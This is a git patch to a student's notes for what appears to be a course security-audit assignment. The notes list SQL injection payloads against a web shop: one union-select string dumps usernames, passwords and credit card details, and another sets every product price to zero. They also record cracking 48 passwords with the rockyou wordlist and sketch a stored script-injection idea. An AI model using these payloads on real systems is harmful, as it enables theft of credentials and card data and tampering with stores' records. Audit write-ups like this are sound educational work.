From 1df6f9343f30210d58964b16a404394849ad0db7 Mon Sep 17 00:00:00 2001 From: Jet Hughes Date: Thu, 8 Sep 2022 11:23:34 +1200 Subject: [PATCH] vault backup: 2022-09-08 11:23:34 --- content/notes/ass01-security-audit.md | 8 ++++++-- 1 file changed, 6 insertions(+), 2 deletions(-) diff --git a/content/notes/ass01-security-audit.md b/content/notes/ass01-security-audit.md index 3ec5fb270..d85005c35 100644 --- a/content/notes/ass01-security-audit.md +++ b/content/notes/ass01-security-audit.md @@ -23,10 +23,14 @@ Jet Hughes - 9474308 - we are able to extract data which is displayed as the users username - we can extract the data from the data base using this "username" - ' union select group_concat(username||':'||password||':'||name||':'||credit_card_number||':'||credit_card_expiry||':'||credit_card_cvv) from user as name;-- -- I was able to crack 48 of the 101 passwords using the rockyou wordlist. I'm sure It would not be difficult to crack more. + - I was able to crack 48 of the 101 passwords using the rockyou wordlist. I'm sure It would not be difficult to crack more. +- you cant also update the data. E.g., set the price of all products to zero using this as a username in the login box + - '; update PRODUCT set UNIT_PRICE = 0 where 1=1;-- ## Javascript Injection - +- I could be possible to perform a javascript injection as the users name is displayed in the website. and prodcut information is displayed in the view catalogue page +- You could update a products name to be a script which would then run on others systems +- e.g. '; update PRODUCT set DESCRIPTION = '' where PRODUCT_ID = 67696;-- ## Path traversal ## Network-Level security